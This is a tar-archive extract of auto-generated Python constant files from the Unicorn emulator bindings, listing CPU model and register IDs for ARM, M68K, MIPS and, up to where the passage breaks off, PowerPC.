��������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/arm_const.py��������������������������������������������������0000664�0000000�0000000�00000007746�14675241067�0022354�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [arm_const.py] # ARM CPU UC_CPU_ARM_926 = 0 UC_CPU_ARM_946 = 1 UC_CPU_ARM_1026 = 2 UC_CPU_ARM_1136_R2 = 3 UC_CPU_ARM_1136 = 4 UC_CPU_ARM_1176 = 5 UC_CPU_ARM_11MPCORE = 6 UC_CPU_ARM_CORTEX_M0 = 7 UC_CPU_ARM_CORTEX_M3 = 8 UC_CPU_ARM_CORTEX_M4 = 9 UC_CPU_ARM_CORTEX_M7 = 10 UC_CPU_ARM_CORTEX_M33 = 11 UC_CPU_ARM_CORTEX_R5 = 12 UC_CPU_ARM_CORTEX_R5F = 13 UC_CPU_ARM_CORTEX_A7 = 14 UC_CPU_ARM_CORTEX_A8 = 15 UC_CPU_ARM_CORTEX_A9 = 16 UC_CPU_ARM_CORTEX_A15 = 17 UC_CPU_ARM_TI925T = 18 UC_CPU_ARM_SA1100 = 19 UC_CPU_ARM_SA1110 = 20 UC_CPU_ARM_PXA250 = 21 UC_CPU_ARM_PXA255 = 22 UC_CPU_ARM_PXA260 = 23 UC_CPU_ARM_PXA261 = 24 UC_CPU_ARM_PXA262 = 25 UC_CPU_ARM_PXA270 = 26 UC_CPU_ARM_PXA270A0 = 27 UC_CPU_ARM_PXA270A1 = 28 UC_CPU_ARM_PXA270B0 = 29 UC_CPU_ARM_PXA270B1 = 30 UC_CPU_ARM_PXA270C0 = 31 UC_CPU_ARM_PXA270C5 = 32 UC_CPU_ARM_MAX = 33 UC_CPU_ARM_ENDING = 34 # ARM registers UC_ARM_REG_INVALID = 0 UC_ARM_REG_APSR = 1 UC_ARM_REG_APSR_NZCV = 2 UC_ARM_REG_CPSR = 3 UC_ARM_REG_FPEXC = 4 UC_ARM_REG_FPINST = 5 UC_ARM_REG_FPSCR = 6 UC_ARM_REG_FPSCR_NZCV = 7 UC_ARM_REG_FPSID = 8 UC_ARM_REG_ITSTATE = 9 UC_ARM_REG_LR = 10 UC_ARM_REG_PC = 11 UC_ARM_REG_SP = 12 UC_ARM_REG_SPSR = 13 UC_ARM_REG_D0 = 14 UC_ARM_REG_D1 = 15 UC_ARM_REG_D2 = 16 UC_ARM_REG_D3 = 17 UC_ARM_REG_D4 = 18 UC_ARM_REG_D5 = 19 UC_ARM_REG_D6 = 20 UC_ARM_REG_D7 = 21 UC_ARM_REG_D8 = 22 UC_ARM_REG_D9 = 23 UC_ARM_REG_D10 = 24 UC_ARM_REG_D11 = 25 UC_ARM_REG_D12 = 26 UC_ARM_REG_D13 = 27 UC_ARM_REG_D14 = 28 UC_ARM_REG_D15 = 29 UC_ARM_REG_D16 = 30 UC_ARM_REG_D17 = 31 UC_ARM_REG_D18 = 32 UC_ARM_REG_D19 = 33 UC_ARM_REG_D20 = 34 UC_ARM_REG_D21 = 35 UC_ARM_REG_D22 = 36 UC_ARM_REG_D23 = 37 UC_ARM_REG_D24 = 38 UC_ARM_REG_D25 = 39 UC_ARM_REG_D26 = 40 UC_ARM_REG_D27 = 41 UC_ARM_REG_D28 = 42 UC_ARM_REG_D29 = 43 UC_ARM_REG_D30 = 44 UC_ARM_REG_D31 = 45 UC_ARM_REG_FPINST2 = 46 UC_ARM_REG_MVFR0 = 47 UC_ARM_REG_MVFR1 = 48 UC_ARM_REG_MVFR2 = 49 UC_ARM_REG_Q0 = 50 UC_ARM_REG_Q1 = 51 UC_ARM_REG_Q2 = 52 UC_ARM_REG_Q3 = 53 UC_ARM_REG_Q4 = 54 UC_ARM_REG_Q5 = 55 UC_ARM_REG_Q6 = 56 UC_ARM_REG_Q7 = 57 UC_ARM_REG_Q8 = 58 UC_ARM_REG_Q9 = 59 UC_ARM_REG_Q10 = 60 UC_ARM_REG_Q11 = 61 UC_ARM_REG_Q12 = 62 UC_ARM_REG_Q13 = 63 UC_ARM_REG_Q14 = 64 UC_ARM_REG_Q15 = 65 UC_ARM_REG_R0 = 66 UC_ARM_REG_R1 = 67 UC_ARM_REG_R2 = 68 UC_ARM_REG_R3 = 69 UC_ARM_REG_R4 = 70 UC_ARM_REG_R5 = 71 UC_ARM_REG_R6 = 72 UC_ARM_REG_R7 = 73 UC_ARM_REG_R8 = 74 UC_ARM_REG_R9 = 75 UC_ARM_REG_R10 = 76 UC_ARM_REG_R11 = 77 UC_ARM_REG_R12 = 78 UC_ARM_REG_S0 = 79 UC_ARM_REG_S1 = 80 UC_ARM_REG_S2 = 81 UC_ARM_REG_S3 = 82 UC_ARM_REG_S4 = 83 UC_ARM_REG_S5 = 84 UC_ARM_REG_S6 = 85 UC_ARM_REG_S7 = 86 UC_ARM_REG_S8 = 87 UC_ARM_REG_S9 = 88 UC_ARM_REG_S10 = 89 UC_ARM_REG_S11 = 90 UC_ARM_REG_S12 = 91 UC_ARM_REG_S13 = 92 UC_ARM_REG_S14 = 93 UC_ARM_REG_S15 = 94 UC_ARM_REG_S16 = 95 UC_ARM_REG_S17 = 96 UC_ARM_REG_S18 = 97 UC_ARM_REG_S19 = 98 UC_ARM_REG_S20 = 99 UC_ARM_REG_S21 = 100 UC_ARM_REG_S22 = 101 UC_ARM_REG_S23 = 102 UC_ARM_REG_S24 = 103 UC_ARM_REG_S25 = 104 UC_ARM_REG_S26 = 105 UC_ARM_REG_S27 = 106 UC_ARM_REG_S28 = 107 UC_ARM_REG_S29 = 108 UC_ARM_REG_S30 = 109 UC_ARM_REG_S31 = 110 UC_ARM_REG_C1_C0_2 = 111 UC_ARM_REG_C13_C0_2 = 112 UC_ARM_REG_C13_C0_3 = 113 UC_ARM_REG_IPSR = 114 UC_ARM_REG_MSP = 115 UC_ARM_REG_PSP = 116 UC_ARM_REG_CONTROL = 117 UC_ARM_REG_IAPSR = 118 UC_ARM_REG_EAPSR = 119 UC_ARM_REG_XPSR = 120 UC_ARM_REG_EPSR = 121 UC_ARM_REG_IEPSR = 122 UC_ARM_REG_PRIMASK = 123 UC_ARM_REG_BASEPRI = 124 UC_ARM_REG_BASEPRI_MAX = 125 UC_ARM_REG_FAULTMASK = 126 UC_ARM_REG_APSR_NZCVQ = 127 UC_ARM_REG_APSR_G = 128 UC_ARM_REG_APSR_NZCVQG = 129 UC_ARM_REG_IAPSR_NZCVQ = 130 UC_ARM_REG_IAPSR_G = 131 UC_ARM_REG_IAPSR_NZCVQG = 132 UC_ARM_REG_EAPSR_NZCVQ = 133 UC_ARM_REG_EAPSR_G = 134 UC_ARM_REG_EAPSR_NZCVQG = 135 UC_ARM_REG_XPSR_NZCVQ = 136 UC_ARM_REG_XPSR_G = 137 UC_ARM_REG_XPSR_NZCVQG = 138 UC_ARM_REG_CP_REG = 139 UC_ARM_REG_ENDING = 140 # alias registers UC_ARM_REG_R13 = 12 UC_ARM_REG_R14 = 10 UC_ARM_REG_R15 = 11 UC_ARM_REG_SB = 75 UC_ARM_REG_SL = 76 UC_ARM_REG_FP = 77 UC_ARM_REG_IP = 78 ��������������������������unicorn-2.1.1/bindings/python/unicorn/m68k_const.py�������������������������������������������������0000664�0000000�0000000�00000001326�14675241067�0022346�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [m68k_const.py] # M68K CPU UC_CPU_M68K_M5206 = 0 UC_CPU_M68K_M68000 = 1 UC_CPU_M68K_M68020 = 2 UC_CPU_M68K_M68030 = 3 UC_CPU_M68K_M68040 = 4 UC_CPU_M68K_M68060 = 5 UC_CPU_M68K_M5208 = 6 UC_CPU_M68K_CFV4E = 7 UC_CPU_M68K_ANY = 8 UC_CPU_M68K_ENDING = 9 # M68K registers UC_M68K_REG_INVALID = 0 UC_M68K_REG_A0 = 1 UC_M68K_REG_A1 = 2 UC_M68K_REG_A2 = 3 UC_M68K_REG_A3 = 4 UC_M68K_REG_A4 = 5 UC_M68K_REG_A5 = 6 UC_M68K_REG_A6 = 7 UC_M68K_REG_A7 = 8 UC_M68K_REG_D0 = 9 UC_M68K_REG_D1 = 10 UC_M68K_REG_D2 = 11 UC_M68K_REG_D3 = 12 UC_M68K_REG_D4 = 13 UC_M68K_REG_D5 = 14 UC_M68K_REG_D6 = 15 UC_M68K_REG_D7 = 16 UC_M68K_REG_SR = 17 UC_M68K_REG_PC = 18 UC_M68K_REG_ENDING = 19 ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/mips_const.py�������������������������������������������������0000664�0000000�0000000�00000011416�14675241067�0022532�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [mips_const.py] # MIPS32 CPUS UC_CPU_MIPS32_4KC = 0 UC_CPU_MIPS32_4KM = 1 UC_CPU_MIPS32_4KECR1 = 2 UC_CPU_MIPS32_4KEMR1 = 3 UC_CPU_MIPS32_4KEC = 4 UC_CPU_MIPS32_4KEM = 5 UC_CPU_MIPS32_24KC = 6 UC_CPU_MIPS32_24KEC = 7 UC_CPU_MIPS32_24KF = 8 UC_CPU_MIPS32_34KF = 9 UC_CPU_MIPS32_74KF = 10 UC_CPU_MIPS32_M14K = 11 UC_CPU_MIPS32_M14KC = 12 UC_CPU_MIPS32_P5600 = 13 UC_CPU_MIPS32_MIPS32R6_GENERIC = 14 UC_CPU_MIPS32_I7200 = 15 UC_CPU_MIPS32_ENDING = 16 # MIPS64 CPUS UC_CPU_MIPS64_R4000 = 0 UC_CPU_MIPS64_VR5432 = 1 UC_CPU_MIPS64_5KC = 2 UC_CPU_MIPS64_5KF = 3 UC_CPU_MIPS64_20KC = 4 UC_CPU_MIPS64_MIPS64R2_GENERIC = 5 UC_CPU_MIPS64_5KEC = 6 UC_CPU_MIPS64_5KEF = 7 UC_CPU_MIPS64_I6400 = 8 UC_CPU_MIPS64_I6500 = 9 UC_CPU_MIPS64_LOONGSON_2E = 10 UC_CPU_MIPS64_LOONGSON_2F = 11 UC_CPU_MIPS64_MIPS64DSPR2 = 12 UC_CPU_MIPS64_ENDING = 13 # MIPS registers UC_MIPS_REG_INVALID = 0 # General purpose registers UC_MIPS_REG_PC = 1 UC_MIPS_REG_0 = 2 UC_MIPS_REG_1 = 3 UC_MIPS_REG_2 = 4 UC_MIPS_REG_3 = 5 UC_MIPS_REG_4 = 6 UC_MIPS_REG_5 = 7 UC_MIPS_REG_6 = 8 UC_MIPS_REG_7 = 9 UC_MIPS_REG_8 = 10 UC_MIPS_REG_9 = 11 UC_MIPS_REG_10 = 12 UC_MIPS_REG_11 = 13 UC_MIPS_REG_12 = 14 UC_MIPS_REG_13 = 15 UC_MIPS_REG_14 = 16 UC_MIPS_REG_15 = 17 UC_MIPS_REG_16 = 18 UC_MIPS_REG_17 = 19 UC_MIPS_REG_18 = 20 UC_MIPS_REG_19 = 21 UC_MIPS_REG_20 = 22 UC_MIPS_REG_21 = 23 UC_MIPS_REG_22 = 24 UC_MIPS_REG_23 = 25 UC_MIPS_REG_24 = 26 UC_MIPS_REG_25 = 27 UC_MIPS_REG_26 = 28 UC_MIPS_REG_27 = 29 UC_MIPS_REG_28 = 30 UC_MIPS_REG_29 = 31 UC_MIPS_REG_30 = 32 UC_MIPS_REG_31 = 33 # DSP registers UC_MIPS_REG_DSPCCOND = 34 UC_MIPS_REG_DSPCARRY = 35 UC_MIPS_REG_DSPEFI = 36 UC_MIPS_REG_DSPOUTFLAG = 37 UC_MIPS_REG_DSPOUTFLAG16_19 = 38 UC_MIPS_REG_DSPOUTFLAG20 = 39 UC_MIPS_REG_DSPOUTFLAG21 = 40 UC_MIPS_REG_DSPOUTFLAG22 = 41 UC_MIPS_REG_DSPOUTFLAG23 = 42 UC_MIPS_REG_DSPPOS = 43 UC_MIPS_REG_DSPSCOUNT = 44 # ACC registers UC_MIPS_REG_AC0 = 45 UC_MIPS_REG_AC1 = 46 UC_MIPS_REG_AC2 = 47 UC_MIPS_REG_AC3 = 48 # COP registers UC_MIPS_REG_CC0 = 49 UC_MIPS_REG_CC1 = 50 UC_MIPS_REG_CC2 = 51 UC_MIPS_REG_CC3 = 52 UC_MIPS_REG_CC4 = 53 UC_MIPS_REG_CC5 = 54 UC_MIPS_REG_CC6 = 55 UC_MIPS_REG_CC7 = 56 # FPU registers UC_MIPS_REG_F0 = 57 UC_MIPS_REG_F1 = 58 UC_MIPS_REG_F2 = 59 UC_MIPS_REG_F3 = 60 UC_MIPS_REG_F4 = 61 UC_MIPS_REG_F5 = 62 UC_MIPS_REG_F6 = 63 UC_MIPS_REG_F7 = 64 UC_MIPS_REG_F8 = 65 UC_MIPS_REG_F9 = 66 UC_MIPS_REG_F10 = 67 UC_MIPS_REG_F11 = 68 UC_MIPS_REG_F12 = 69 UC_MIPS_REG_F13 = 70 UC_MIPS_REG_F14 = 71 UC_MIPS_REG_F15 = 72 UC_MIPS_REG_F16 = 73 UC_MIPS_REG_F17 = 74 UC_MIPS_REG_F18 = 75 UC_MIPS_REG_F19 = 76 UC_MIPS_REG_F20 = 77 UC_MIPS_REG_F21 = 78 UC_MIPS_REG_F22 = 79 UC_MIPS_REG_F23 = 80 UC_MIPS_REG_F24 = 81 UC_MIPS_REG_F25 = 82 UC_MIPS_REG_F26 = 83 UC_MIPS_REG_F27 = 84 UC_MIPS_REG_F28 = 85 UC_MIPS_REG_F29 = 86 UC_MIPS_REG_F30 = 87 UC_MIPS_REG_F31 = 88 UC_MIPS_REG_FCC0 = 89 UC_MIPS_REG_FCC1 = 90 UC_MIPS_REG_FCC2 = 91 UC_MIPS_REG_FCC3 = 92 UC_MIPS_REG_FCC4 = 93 UC_MIPS_REG_FCC5 = 94 UC_MIPS_REG_FCC6 = 95 UC_MIPS_REG_FCC7 = 96 # AFPR128 UC_MIPS_REG_W0 = 97 UC_MIPS_REG_W1 = 98 UC_MIPS_REG_W2 = 99 UC_MIPS_REG_W3 = 100 UC_MIPS_REG_W4 = 101 UC_MIPS_REG_W5 = 102 UC_MIPS_REG_W6 = 103 UC_MIPS_REG_W7 = 104 UC_MIPS_REG_W8 = 105 UC_MIPS_REG_W9 = 106 UC_MIPS_REG_W10 = 107 UC_MIPS_REG_W11 = 108 UC_MIPS_REG_W12 = 109 UC_MIPS_REG_W13 = 110 UC_MIPS_REG_W14 = 111 UC_MIPS_REG_W15 = 112 UC_MIPS_REG_W16 = 113 UC_MIPS_REG_W17 = 114 UC_MIPS_REG_W18 = 115 UC_MIPS_REG_W19 = 116 UC_MIPS_REG_W20 = 117 UC_MIPS_REG_W21 = 118 UC_MIPS_REG_W22 = 119 UC_MIPS_REG_W23 = 120 UC_MIPS_REG_W24 = 121 UC_MIPS_REG_W25 = 122 UC_MIPS_REG_W26 = 123 UC_MIPS_REG_W27 = 124 UC_MIPS_REG_W28 = 125 UC_MIPS_REG_W29 = 126 UC_MIPS_REG_W30 = 127 UC_MIPS_REG_W31 = 128 UC_MIPS_REG_HI = 129 UC_MIPS_REG_LO = 130 UC_MIPS_REG_P0 = 131 UC_MIPS_REG_P1 = 132 UC_MIPS_REG_P2 = 133 UC_MIPS_REG_MPL0 = 134 UC_MIPS_REG_MPL1 = 135 UC_MIPS_REG_MPL2 = 136 UC_MIPS_REG_CP0_CONFIG3 = 137 UC_MIPS_REG_CP0_USERLOCAL = 138 UC_MIPS_REG_CP0_STATUS = 139 UC_MIPS_REG_ENDING = 140 UC_MIPS_REG_ZERO = 2 UC_MIPS_REG_AT = 3 UC_MIPS_REG_V0 = 4 UC_MIPS_REG_V1 = 5 UC_MIPS_REG_A0 = 6 UC_MIPS_REG_A1 = 7 UC_MIPS_REG_A2 = 8 UC_MIPS_REG_A3 = 9 UC_MIPS_REG_T0 = 10 UC_MIPS_REG_T1 = 11 UC_MIPS_REG_T2 = 12 UC_MIPS_REG_T3 = 13 UC_MIPS_REG_T4 = 14 UC_MIPS_REG_T5 = 15 UC_MIPS_REG_T6 = 16 UC_MIPS_REG_T7 = 17 UC_MIPS_REG_S0 = 18 UC_MIPS_REG_S1 = 19 UC_MIPS_REG_S2 = 20 UC_MIPS_REG_S3 = 21 UC_MIPS_REG_S4 = 22 UC_MIPS_REG_S5 = 23 UC_MIPS_REG_S6 = 24 UC_MIPS_REG_S7 = 25 UC_MIPS_REG_T8 = 26 UC_MIPS_REG_T9 = 27 UC_MIPS_REG_K0 = 28 UC_MIPS_REG_K1 = 29 UC_MIPS_REG_GP = 30 UC_MIPS_REG_SP = 31 UC_MIPS_REG_FP = 32 UC_MIPS_REG_S8 = 32 UC_MIPS_REG_RA = 33 UC_MIPS_REG_HI0 = 45 UC_MIPS_REG_HI1 = 46 UC_MIPS_REG_HI2 = 47 UC_MIPS_REG_HI3 = 48 UC_MIPS_REG_LO0 = 45 UC_MIPS_REG_LO1 = 46 UC_MIPS_REG_LO2 = 47 UC_MIPS_REG_LO3 = 48 ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/ppc_const.py��������������������������������������������������0000664�0000000�0000000�00000024354�14675241067�0022351�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [ppc_const.py] # PPC CPU UC_CPU_PPC32_401 = 0 UC_CPU_PPC32_401A1 = 1 UC_CPU_PPC32_401B2 = 2 UC_CPU_PPC32_401C2 = 3 UC_CPU_PPC32_401D2 = 4 UC_CPU_PPC32_401E2 = 5 UC_CPU_PPC32_401F2 = 6 UC_CPU_PPC32_401G2 = 7 UC_CPU_PPC32_IOP480 = 8 UC_CPU_PPC32_COBRA = 9 UC_CPU_PPC32_403GA = 10 UC_CPU_PPC32_403GB = 11 UC_CPU_PPC32_403GC = 12 UC_CPU_PPC32_403GCX = 13 UC_CPU_PPC32_405D2 = 14 UC_CPU_PPC32_405D4 = 15 UC_CPU_PPC32_405CRA = 16 UC_CPU_PPC32_405CRB = 17 UC_CPU_PPC32_405CRC = 18 UC_CPU_PPC32_405EP = 19 UC_CPU_PPC32_405EZ = 20 UC_CPU_PPC32_405GPA = 21 UC_CPU_PPC32_405GPB = 22 UC_CPU_PPC32_405GPC = 23 UC_CPU_PPC32_405GPD = 24 UC_CPU_PPC32_405GPR = 25 UC_CPU_PPC32_405LP = 26 UC_CPU_PPC32_NPE405H = 27 UC_CPU_PPC32_NPE405H2 = 28 UC_CPU_PPC32_NPE405L = 29 UC_CPU_PPC32_NPE4GS3 = 30 UC_CPU_PPC32_STB03 = 31 UC_CPU_PPC32_STB04 = 32 UC_CPU_PPC32_STB25 = 33 UC_CPU_PPC32_X2VP4 = 34 UC_CPU_PPC32_X2VP20 = 35 UC_CPU_PPC32_440_XILINX = 36 UC_CPU_PPC32_440_XILINX_W_DFPU = 37 UC_CPU_PPC32_440EPA = 38 UC_CPU_PPC32_440EPB = 39 UC_CPU_PPC32_440EPX = 40 UC_CPU_PPC32_460EXB = 41 UC_CPU_PPC32_G2 = 42 UC_CPU_PPC32_G2H4 = 43 UC_CPU_PPC32_G2GP = 44 UC_CPU_PPC32_G2LS = 45 UC_CPU_PPC32_G2HIP3 = 46 UC_CPU_PPC32_G2HIP4 = 47 UC_CPU_PPC32_MPC603 = 48 UC_CPU_PPC32_G2LE = 49 UC_CPU_PPC32_G2LEGP = 50 UC_CPU_PPC32_G2LELS = 51 UC_CPU_PPC32_G2LEGP1 = 52 UC_CPU_PPC32_G2LEGP3 = 53 UC_CPU_PPC32_MPC5200_V10 = 54 UC_CPU_PPC32_MPC5200_V11 = 55 UC_CPU_PPC32_MPC5200_V12 = 56 UC_CPU_PPC32_MPC5200B_V20 = 57 UC_CPU_PPC32_MPC5200B_V21 = 58 UC_CPU_PPC32_E200Z5 = 59 UC_CPU_PPC32_E200Z6 = 60 UC_CPU_PPC32_E300C1 = 61 UC_CPU_PPC32_E300C2 = 62 UC_CPU_PPC32_E300C3 = 63 UC_CPU_PPC32_E300C4 = 64 UC_CPU_PPC32_MPC8343 = 65 UC_CPU_PPC32_MPC8343A = 66 UC_CPU_PPC32_MPC8343E = 67 UC_CPU_PPC32_MPC8343EA = 68 UC_CPU_PPC32_MPC8347T = 69 UC_CPU_PPC32_MPC8347P = 70 UC_CPU_PPC32_MPC8347AT = 71 UC_CPU_PPC32_MPC8347AP = 72 UC_CPU_PPC32_MPC8347ET = 73 UC_CPU_PPC32_MPC8347EP = 74 UC_CPU_PPC32_MPC8347EAT = 75 UC_CPU_PPC32_MPC8347EAP = 76 UC_CPU_PPC32_MPC8349 = 77 UC_CPU_PPC32_MPC8349A = 78 UC_CPU_PPC32_MPC8349E = 79 UC_CPU_PPC32_MPC8349EA = 80 UC_CPU_PPC32_MPC8377 = 81 UC_CPU_PPC32_MPC8377E = 82 UC_CPU_PPC32_MPC8378 = 83 UC_CPU_PPC32_MPC8378E = 84 UC_CPU_PPC32_MPC8379 = 85 UC_CPU_PPC32_MPC8379E = 86 UC_CPU_PPC32_E500_V10 = 87 UC_CPU_PPC32_E500_V20 = 88 UC_CPU_PPC32_E500V2_V10 = 89 UC_CPU_PPC32_E500V2_V20 = 90 UC_CPU_PPC32_E500V2_V21 = 91 UC_CPU_PPC32_E500V2_V22 = 92 UC_CPU_PPC32_E500V2_V30 = 93 UC_CPU_PPC32_E500MC = 94 UC_CPU_PPC32_MPC8533_V10 = 95 UC_CPU_PPC32_MPC8533_V11 = 96 UC_CPU_PPC32_MPC8533E_V10 = 97 UC_CPU_PPC32_MPC8533E_V11 = 98 UC_CPU_PPC32_MPC8540_V10 = 99 UC_CPU_PPC32_MPC8540_V20 = 100 UC_CPU_PPC32_MPC8540_V21 = 101 UC_CPU_PPC32_MPC8541_V10 = 102 UC_CPU_PPC32_MPC8541_V11 = 103 UC_CPU_PPC32_MPC8541E_V10 = 104 UC_CPU_PPC32_MPC8541E_V11 = 105 UC_CPU_PPC32_MPC8543_V10 = 106 UC_CPU_PPC32_MPC8543_V11 = 107 UC_CPU_PPC32_MPC8543_V20 = 108 UC_CPU_PPC32_MPC8543_V21 = 109 UC_CPU_PPC32_MPC8543E_V10 = 110 UC_CPU_PPC32_MPC8543E_V11 = 111 UC_CPU_PPC32_MPC8543E_V20 = 112 UC_CPU_PPC32_MPC8543E_V21 = 113 UC_CPU_PPC32_MPC8544_V10 = 114 UC_CPU_PPC32_MPC8544_V11 = 115 UC_CPU_PPC32_MPC8544E_V10 = 116 UC_CPU_PPC32_MPC8544E_V11 = 117 UC_CPU_PPC32_MPC8545_V20 = 118 UC_CPU_PPC32_MPC8545_V21 = 119 UC_CPU_PPC32_MPC8545E_V20 = 120 UC_CPU_PPC32_MPC8545E_V21 = 121 UC_CPU_PPC32_MPC8547E_V20 = 122 UC_CPU_PPC32_MPC8547E_V21 = 123 UC_CPU_PPC32_MPC8548_V10 = 124 UC_CPU_PPC32_MPC8548_V11 = 125 UC_CPU_PPC32_MPC8548_V20 = 126 UC_CPU_PPC32_MPC8548_V21 = 127 UC_CPU_PPC32_MPC8548E_V10 = 128 UC_CPU_PPC32_MPC8548E_V11 = 129 UC_CPU_PPC32_MPC8548E_V20 = 130 UC_CPU_PPC32_MPC8548E_V21 = 131 UC_CPU_PPC32_MPC8555_V10 = 132 UC_CPU_PPC32_MPC8555_V11 = 133 UC_CPU_PPC32_MPC8555E_V10 = 134 UC_CPU_PPC32_MPC8555E_V11 = 135 UC_CPU_PPC32_MPC8560_V10 = 136 UC_CPU_PPC32_MPC8560_V20 = 137 UC_CPU_PPC32_MPC8560_V21 = 138 UC_CPU_PPC32_MPC8567 = 139 UC_CPU_PPC32_MPC8567E = 140 UC_CPU_PPC32_MPC8568 = 141 UC_CPU_PPC32_MPC8568E = 142 UC_CPU_PPC32_MPC8572 = 143 UC_CPU_PPC32_MPC8572E = 144 UC_CPU_PPC32_E600 = 145 UC_CPU_PPC32_MPC8610 = 146 UC_CPU_PPC32_MPC8641 = 147 UC_CPU_PPC32_MPC8641D = 148 UC_CPU_PPC32_601_V0 = 149 UC_CPU_PPC32_601_V1 = 150 UC_CPU_PPC32_601_V2 = 151 UC_CPU_PPC32_602 = 152 UC_CPU_PPC32_603 = 153 UC_CPU_PPC32_603E_V1_1 = 154 UC_CPU_PPC32_603E_V1_2 = 155 UC_CPU_PPC32_603E_V1_3 = 156 UC_CPU_PPC32_603E_V1_4 = 157 UC_CPU_PPC32_603E_V2_2 = 158 UC_CPU_PPC32_603E_V3 = 159 UC_CPU_PPC32_603E_V4 = 160 UC_CPU_PPC32_603E_V4_1 = 161 UC_CPU_PPC32_603E7 = 162 UC_CPU_PPC32_603E7T = 163 UC_CPU_PPC32_603E7V = 164 UC_CPU_PPC32_603E7V1 = 165 UC_CPU_PPC32_603E7V2 = 166 UC_CPU_PPC32_603P = 167 UC_CPU_PPC32_604 = 168 UC_CPU_PPC32_604E_V1_0 = 169 UC_CPU_PPC32_604E_V2_2 = 170 UC_CPU_PPC32_604E_V2_4 = 171 UC_CPU_PPC32_604R = 172 UC_CPU_PPC32_740_V1_0 = 173 UC_CPU_PPC32_750_V1_0 = 174 UC_CPU_PPC32_740_V2_0 = 175 UC_CPU_PPC32_750_V2_0 = 176 UC_CPU_PPC32_740_V2_1 = 177 UC_CPU_PPC32_750_V2_1 = 178 UC_CPU_PPC32_740_V2_2 = 179 UC_CPU_PPC32_750_V2_2 = 180 UC_CPU_PPC32_740_V3_0 = 181 UC_CPU_PPC32_750_V3_0 = 182 UC_CPU_PPC32_740_V3_1 = 183 UC_CPU_PPC32_750_V3_1 = 184 UC_CPU_PPC32_740E = 185 UC_CPU_PPC32_750E = 186 UC_CPU_PPC32_740P = 187 UC_CPU_PPC32_750P = 188 UC_CPU_PPC32_750CL_V1_0 = 189 UC_CPU_PPC32_750CL_V2_0 = 190 UC_CPU_PPC32_750CX_V1_0 = 191 UC_CPU_PPC32_750CX_V2_0 = 192 UC_CPU_PPC32_750CX_V2_1 = 193 UC_CPU_PPC32_750CX_V2_2 = 194 UC_CPU_PPC32_750CXE_V2_1 = 195 UC_CPU_PPC32_750CXE_V2_2 = 196 UC_CPU_PPC32_750CXE_V2_3 = 197 UC_CPU_PPC32_750CXE_V2_4 = 198 UC_CPU_PPC32_750CXE_V2_4B = 199 UC_CPU_PPC32_750CXE_V3_0 = 200 UC_CPU_PPC32_750CXE_V3_1 = 201 UC_CPU_PPC32_750CXE_V3_1B = 202 UC_CPU_PPC32_750CXR = 203 UC_CPU_PPC32_750FL = 204 UC_CPU_PPC32_750FX_V1_0 = 205 UC_CPU_PPC32_750FX_V2_0 = 206 UC_CPU_PPC32_750FX_V2_1 = 207 UC_CPU_PPC32_750FX_V2_2 = 208 UC_CPU_PPC32_750FX_V2_3 = 209 UC_CPU_PPC32_750GL = 210 UC_CPU_PPC32_750GX_V1_0 = 211 UC_CPU_PPC32_750GX_V1_1 = 212 UC_CPU_PPC32_750GX_V1_2 = 213 UC_CPU_PPC32_750L_V2_0 = 214 UC_CPU_PPC32_750L_V2_1 = 215 UC_CPU_PPC32_750L_V2_2 = 216 UC_CPU_PPC32_750L_V3_0 = 217 UC_CPU_PPC32_750L_V3_2 = 218 UC_CPU_PPC32_745_V1_0 = 219 UC_CPU_PPC32_755_V1_0 = 220 UC_CPU_PPC32_745_V1_1 = 221 UC_CPU_PPC32_755_V1_1 = 222 UC_CPU_PPC32_745_V2_0 = 223 UC_CPU_PPC32_755_V2_0 = 224 UC_CPU_PPC32_745_V2_1 = 225 UC_CPU_PPC32_755_V2_1 = 226 UC_CPU_PPC32_745_V2_2 = 227 UC_CPU_PPC32_755_V2_2 = 228 UC_CPU_PPC32_745_V2_3 = 229 UC_CPU_PPC32_755_V2_3 = 230 UC_CPU_PPC32_745_V2_4 = 231 UC_CPU_PPC32_755_V2_4 = 232 UC_CPU_PPC32_745_V2_5 = 233 UC_CPU_PPC32_755_V2_5 = 234 UC_CPU_PPC32_745_V2_6 = 235 UC_CPU_PPC32_755_V2_6 = 236 UC_CPU_PPC32_745_V2_7 = 237 UC_CPU_PPC32_755_V2_7 = 238 UC_CPU_PPC32_745_V2_8 = 239 UC_CPU_PPC32_755_V2_8 = 240 UC_CPU_PPC32_7400_V1_0 = 241 UC_CPU_PPC32_7400_V1_1 = 242 UC_CPU_PPC32_7400_V2_0 = 243 UC_CPU_PPC32_7400_V2_1 = 244 UC_CPU_PPC32_7400_V2_2 = 245 UC_CPU_PPC32_7400_V2_6 = 246 UC_CPU_PPC32_7400_V2_7 = 247 UC_CPU_PPC32_7400_V2_8 = 248 UC_CPU_PPC32_7400_V2_9 = 249 UC_CPU_PPC32_7410_V1_0 = 250 UC_CPU_PPC32_7410_V1_1 = 251 UC_CPU_PPC32_7410_V1_2 = 252 UC_CPU_PPC32_7410_V1_3 = 253 UC_CPU_PPC32_7410_V1_4 = 254 UC_CPU_PPC32_7448_V1_0 = 255 UC_CPU_PPC32_7448_V1_1 = 256 UC_CPU_PPC32_7448_V2_0 = 257 UC_CPU_PPC32_7448_V2_1 = 258 UC_CPU_PPC32_7450_V1_0 = 259 UC_CPU_PPC32_7450_V1_1 = 260 UC_CPU_PPC32_7450_V1_2 = 261 UC_CPU_PPC32_7450_V2_0 = 262 UC_CPU_PPC32_7450_V2_1 = 263 